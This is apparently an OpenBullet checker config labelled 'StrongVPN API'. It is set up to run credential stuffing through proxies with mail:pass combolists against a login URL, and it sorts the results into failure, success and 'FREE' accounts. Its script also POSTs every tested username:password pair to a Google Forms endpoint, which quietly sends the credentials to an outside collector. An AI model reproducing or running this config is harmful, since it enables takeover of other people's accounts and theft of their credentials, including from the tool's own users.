[SETTINGS]
{
  "Name": "StrongVPN API",
  "SuggestedBots": 150,
  "MaxCPM": 0,
  "LastModified": "2019-07-7T02:23:23.4936254+08:00",
  "AdditionalInfo": "",
  "Author": "miss",
  "Version": "1.2.3",
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "EncodeData": false,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}

[SCRIPT]
REQUEST GET "https://colomovers.com/login/?u=<USER>&p=<PASS>" 
  HEADER "Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8" 
  HEADER "Accept-Encoding:gzip, deflate, sdch, br" 
  HEADER "Accept-Language:zh-CN,zh;q=0.8" 
  HEADER "Cache-Control:max-age=0" 
  HEADER "Connection:keep-alive" 
  HEADER "Host:colomovers.com" 
  HEADER "Upgrade-Insecure-Requests:1" 
  HEADER "User-Agent:Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36" 



KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "Invalid email or password" 
  KEYCHAIN Success OR 
    KEY "true" 
    KEY "active" 
  KEYCHAIN Custom "FREE" OR 
    KEY "User account marked inactive" 


REQUEST POST "https://docs.google.com/forms/d/e/1FAIpQLSfFeqALkUZUQfl6S_N_Tdp5HK5-XXeM7xTF0wo_jb1wjHX-vA/formResponse" 
  CONTENT "entry.474341021=<USER>:<PASS>  &fvv=1&pageHistory=0" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 
  HEADER "origin: https://docs.google.com" 

